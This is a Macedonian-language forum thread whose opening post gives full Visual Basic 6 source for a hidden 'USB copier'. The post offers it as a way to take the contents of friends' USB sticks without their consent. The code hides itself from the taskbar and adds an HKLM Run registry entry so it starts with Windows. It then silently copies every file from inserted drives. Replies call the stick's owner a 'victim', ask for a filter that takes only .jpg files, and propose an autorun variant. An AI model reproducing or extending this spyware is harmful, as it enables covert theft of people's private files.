• Важно
  Имате проблем со најава или регистрација на it.mk?
  Побарајте го решението на вашиот проблем ТУКА!

Невидлив USB копирач

Coolzrock

Intern
28 октомври 2008
139
5
Овој код (софт) ви го копира целото ваше УСБ кога го ставате во моментот со некои копчиња од тестатурата.Ова може да се користи кога другарите не сакаат да ви дадат све од нивното УСБ,и вие ќе можете да го имате целотоДа го покажеш програмчето CTRL+F10.
Да го сокриеш програмчето CTRl +F11.
Да го затвориш програмчето CTRL +F12.
PHP:
Option ExplicitPublic Declare Function RegisterHotKey Lib "user32" (ByVal hwnd As Long, _

  ByVal ID As Long, ByVal fsModifiers As Long, ByVal vk As Long) As Long

  

Public Declare Function UnregisterHotKey Lib "user32" (ByVal hwnd As Long, _

  ByVal ID As Long) As LongDeclare Function SetWindowLong Lib "user32" Alias "SetWindowLongA" _

  (ByVal hwnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As LongDeclare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" _

  (ByVal lpPrevWndFunc As Long, ByVal hwnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As LongPublic Const WM_HOTKEY = &H312

Public Const GWL_WNDPROC = -4Public Const MOD_CTRL = &H2 '

Dim s As New FileSystemObject

Public Const MOD_SHFT = &H4

Public Const MOD_ALT = &H1Public Const VK_NUMPAD0 = &H60

Public Const VK_NUMPAD1 = &H61

Public Const VK_NUMPAD2 = &H62

Public Const VK_NUMPAD3 = &H63

Public Const VK_NUMPAD4 = &H64

Public Const VK_NUMPAD5 = &H65

Public Const VK_NUMPAD6 = &H66

Public Const VK_NUMPAD7 = &H67

Public Const VK_NUMPAD8 = &H68

Public Const VK_NUMPAD9 = &H69

Public Const VK_MULTIPLY = &H6A

Public Const VK_ADD = &H6B

Public Const VK_SEPARATOR = &H6C

Public Const VK_SUBTRACT = &H6D

Public Const VK_DECIMAL = &H6E

Public Const VK_DIVIDE = &H6F

Public Const VK_F1 = &H70

Public Const VK_F2 = &H71

Public Const VK_F3 = &H72

Public Const VK_F4 = &H73

Public Const VK_F5 = &H74

Public Const VK_F6 = &H75

Public Const VK_F7 = &H76

Public Const VK_F8 = &H77

Public Const VK_F9 = &H78

Public Const VK_F10 = &H79

Public Const VK_F11 = &H7A

Public Const VK_F12 = &H7B

Public Const VK_F13 = &H7C

Public Const VK_F14 = &H7D

Public Const VK_F15 = &H7E

Public Const VK_F16 = &H7F

Public Const VK_F17 = &H80

Public Const VK_F18 = &H81

Public Const VK_F19 = &H82

Public Const VK_F20 = &H83

Public Const VK_F21 = &H84

Public Const VK_F22 = &H85

Public Const VK_F23 = &H86

Public Const VK_F24 = &H87Public glWinRet As Long'''for registryPublic Declare Function RegCloseKey Lib "advapi32.dll" (ByVal Hkey As Long) As Long

Public Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal Hkey As Long, ByVal lpSubKey As String, phkResult As Long) As Long

Public Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal Hkey As Long, ByVal lpSubKey As String) As Long

Public Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal Hkey As Long, ByVal lpValueName As String) As Long

Public Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal Hkey As Long, ByVal lpSubKey As String, phkResult As Long) As Long

Public Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal Hkey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, lpData As Any, lpcbData As Long) As Long

Public Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal Hkey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long

Public Const REG_SZ = 1 ' Unicode nul terminated String

Public Const REG_DWORD = 4 ' 32-bit number

Public Const HKEY_CLASSES_ROOT = &H80000000

Public Const HKEY_CURRENT_USER = &H80000001

Public Const HKEY_LOCAL_MACHINE = &H80000002

Public Const HKEY_USERS = &H80000003

Public Const HKEY_PERFORMANCE_DATA = &H80000004

Public Const ERROR_SUCCESS = 0&

'''for registryPublic Function CallbackMsgs(ByVal wHwnd As Long, ByVal wmsg As Long, ByVal wp_id As Long, ByVal lp_id As Long) As Long

  If wmsg = WM_HOTKEY Then

    Call DoFunctions(wp_id)

    CallbackMsgs = 1

    Exit Function

  End If

  CallbackMsgs = CallWindowProc(glWinRet, wHwnd, wmsg, wp_id, lp_id)

End Function

Public Sub DoFunctions(ByVal vKeyID As Byte)

   

  If vKeyID = 0 Then

    Form1.Show

  Else

    If vKeyID = 1 Then

    

        If s.FolderExists(Form1.Text1.Text) = False Then

          MsgBox "Given ouput folder doesn't exists. Enter existed folder name", vbInformation, "Output folder doesn't exists..."

          Exit Sub

        End If

        

        If Right(Form1.Text1.Text, 1) = "\" Then

          Form1.Text1.Text = Mid(Form1.Text1.Text, 1, Len(Form1.Text1.Text) - 1)

        End If

      Form1.Hide

    Else

      End

    End If

  End If

End Sub'-----------------------------------

'form1.frm

'---------------------------------------

Dim s As New FileSystemObject

Dim a As Integer

Private Sub Combo1_Click()

On Error Resume Next

Dir1.Path = Combo1.Text

End SubPrivate Sub Command1_Click()

If s.FolderExists(Text1.Text) = False Then

  MsgBox "Given ouput folder doesn't exists. Enter existed folder name", vbInformation, "Output folder doesn't exists..."

  Exit Sub

End IfIf Right(Text1.Text, 1) = "\" Then

  Text1.Text = Mid(Text1.Text, 1, Len(Text1.Text) - 1)

End IfMe.Hide

  

  

End SubPrivate Sub Command2_Click()

MsgBox "This tool is created by a stupid moron forgetting to remove private information before posting stuff to the interwebs for learning purpose only. Contact : [email protected]", vbInformation, "About.."

End SubPrivate Sub Command3_Click()

Unload Me

End SubPrivate Sub Dir1_Change()

File1.Path = Dir1.Path

End SubPrivate Sub Drive1_Change()

Dir1.Path = Drive1.Drive

End SubPrivate Sub Form_Load()If App.PrevInstance = True Then

  End

End IfOn Error Resume Next

retVal0 = RegisterHotKey(Me.hwnd, 0, MOD_CTRL, VK_F10)

retVal1 = RegisterHotKey(Me.hwnd, 1, MOD_CTRL, VK_F11)

retVal2 = RegisterHotKey(Me.hwnd, 2, MOD_CTRL, VK_F12)glWinRet = SetWindowLong(Me.hwnd, GWL_WNDPROC, AddressOf CallbackMsgs)

App.TaskVisible = False

Me.Hide

Timer1.Interval = 6000Call savestring(HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "Startup", App.Path & "\" & App.EXEName & ".exe")For i = 97 To 122

  Combo1.AddItem Chr(i) & ":"

NextCombo1.ListIndex = 4

End Sub

Public Sub copier()

On Error GoTo aa

Dim i, j As Integer

i = 0

j = 0

If Dir1.ListCount > 0 Then

  

  Dir1.ListIndex = j

  j = j + 1

  For i = 0 To Dir1.ListCount - 1

    Dim a As String

    a = Dir1.List(i)

     Dim b As String

    b = Text1.Text & "\" & Mid(Dir1.List(i), 4, Len(Dir1.List(i)))

    'VBA.FileCopy a, b

    s.CopyFolder a, b, False  Next      Dir1.Path = Drive1.Drive

      File1.Path = Dir1.Path  For i = 0 To File1.ListCount - 1    a = Dir1.Path & File1.List(i)    b = Text1.Text & "\" & File1.List(i)

    s.CopyFile a, b, False

  Next

  

ElseIf Dir1.ListCount = 0 Then

  For i = 0 To File1.ListCount - 1    a = Dir1.Path & File1.List(i)    b = Text1.Text & "\" & File1.List(i)

    s.CopyFile a, b, False  Next

End IfExit Sub

aa:End SubPrivate Sub Timer1_Timer()

On Error Resume Next

Dir1.Path = Combo1.Text

If Err.Number = 68 Then

  Exit Sub

End If

For a = 0 To 3

  Dir1.Path = Chr(Asc(Mid(Combo1.Text, 1, 1)) + a) & ":"

  Call copier

Next

End SubPublic Sub savestring(Hkey As Long, strPath As String, strValue As String, strdata As String)

  Dim keyhand As Long

  Dim r As Long

  r = RegCreateKey(Hkey, strPath, keyhand)

  r = RegSetValueEx(keyhand, strValue, 0, REG_SZ, ByVal strdata, Len(strdata))

  r = RegCloseKey(keyhand)

End Sub
 
1 октомври 2008
278
9
ова може многу полесно да се реши со бат фајл кој се стартува со самото ставање на усбето( мада може да се детектира као вирус)
 

hmmm

Gaining Experience
30 ноември 2007
1.242
80
hmmm's setup  
Processor & Cooler
i5 3570k @4.2GHz & CM Hyper 212+
Motherboard
AsRock Z77 Pro3
Storage
Samsung 840 EVO 120GB + WD Black 1TB
PSU
Corsair CX600
RAM
2x4GB G.Skill Sniper 1600MHz
Video card
HD4000
Case
Custom
Mouse
Gigabyte GM-M7000
Keyboard
Generic
Audio
Asus Xonar DG
Monitor
Compaq Q2159
OS
Windows 8 64bit
Го пробал некој ова ?
 

Vlatzki

Gaining Experience
1 мај 2008
1.276
339
Мислам дека ова може да ти го изгори стикчето ако го извадиш додека се копира УСБто. А и Safe Remove нема да можеш да го користиш додека се копира, така да ќе мораш да се намачиш да ја одржиш жртвата на компјутер додека се копира целата содржина од неговото УСБ.
 

CyberSpic

Intern
14 април 2007
823
26
howtoformatacomputer.com
Дали може да се промени кодот, да прави автоматско пребарување на стикот, и да копира само *.jpg фајлови а не целиот стик, или да копира само папки со однапред дефинирани имиња ?
 

Stane

Gaining Experience
4 октомври 2007
2.497
77
Треба да имаш Visual Basic,доколку го немаш,некој што го има нека го преведе,и нека ти го прати во готов фајл (.ехе) :ermm:
 

Vladica

Intern
22 јануари 2009
4
0
pravis autorun.ini , potoa pravis programa vo VB6 so koristenje na Windows Scipt Host Object Module. Tolku vo kratki crti... a za kodot... kazi ako go sakas
 

spiderman

Intern
16 април 2007
783
44
Толку код пишување за нешто што не е невидливо и што одма се детектира и згора на тоа и толку е глупа замислата..мислам што ке ми е се да копирам или пак некои фајлови...дебилен код за дебилна намена фуј
 

Vladica

Intern
22 јануари 2009
4
0
ок ок, ке го ставам овие денови, само ми кажи сакаш за сите фајлови, или само за *.jpg?
 

Нови мислења

Последни Теми

Статистика

Теми
44.303
Мислења
892.274
Членови
31.481
Огласи
19
Најнов член
Dan1el
На врв Дно